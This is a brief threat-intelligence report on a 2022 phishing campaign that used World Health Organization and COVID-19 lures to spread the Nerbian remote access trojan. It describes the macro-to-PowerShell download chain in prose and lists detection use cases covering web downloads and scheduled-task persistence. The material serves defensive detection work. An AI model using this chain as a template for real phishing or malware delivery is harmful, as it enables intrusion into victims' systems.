May 17, 2022

Phishing with World Health Organization Themes

Industry: N/A | Level: Tactical | Source: ProofPoint

Research from ProofPoint has identified the distribution of Nerbian remote access trojan (RAT), through phishing emails using COVID-19 and World Health Organization themes. The threat campaign was traced back to getting its start April 26th, 2022, with emails targeting entities located in Italy, Spain, and the United Kingdom. Emails delivered contain either a malicious document or a compressed archive containing a malicious document. The process flow upon the execution of the embedded macro is, CMD calls PowerShell to download a BAT file, the BAT file launches the PowerShell to download additional payloads including the malicious RAT. The RAT establishes persistence and has the capabilities to download additional payloads as needed. There is currently no attribution placed on the Nerbian RAT.

Anvilogic Scenario:

  • Nerbian RAT Infection Chain from Malicious Document

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Suspicious Executable by CMD.exe
  • Executable Create Script Process
  • Invoke-WebRequest Command
  • Executable File Written to Disk
  • Suspicious Executable by Powershell
  • Executable Process from Suspicious Folder
  • Network Connection with Suspicious Folder
  • Create/Modify Schtasks